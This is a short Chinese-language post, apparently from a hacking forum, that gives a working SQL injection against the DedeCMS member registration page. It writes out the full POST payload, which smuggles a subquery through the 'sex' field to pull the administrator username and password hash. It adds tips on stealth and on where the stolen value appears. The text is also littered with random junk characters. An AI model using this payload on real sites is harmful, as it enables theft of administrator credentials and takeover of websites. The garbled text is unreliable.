dedecms版本 201211220 n# }* J7 b: L; ]! @
# A% V- t" @, }( i: O8 h需要magic_quotes_gpc=Off# s" c* @" M: @) {) c
2 Q& s4 [ l0 O
应该是没有什么大危害的漏洞.
% b: h, ^$ F, `, _1 [, C3 g原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
1 ]' Z. |' ~; y: i" D) b/ r0 I
: p, k) e. L2 g3 E3 b是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.: u: M0 x- e. J1 i; P1 j
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
* M3 y, ^4 u, V5 A0 K: c; Q% |" R$ \& t+ I2 Y: s1 _. f
http:///de/member/reg_new.php3 y! G0 l8 V/ Z8 t, j
- X0 L. ^6 w! k9 g- {, d% I: EPOST: o8 f9 S5 Z; ^, J+ v- p& }, U1 S
4 q/ B9 Q7 ?1 F! N) f, J& C# O) e0 }3 V
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=) ^8 t' R) c( `
2 s% y) o0 u5 m- D. W- j! p
成功注册后,头像处里面有好玩的信息.3 E' |1 ]: `6 C. i
: e& M2 O7 |! G |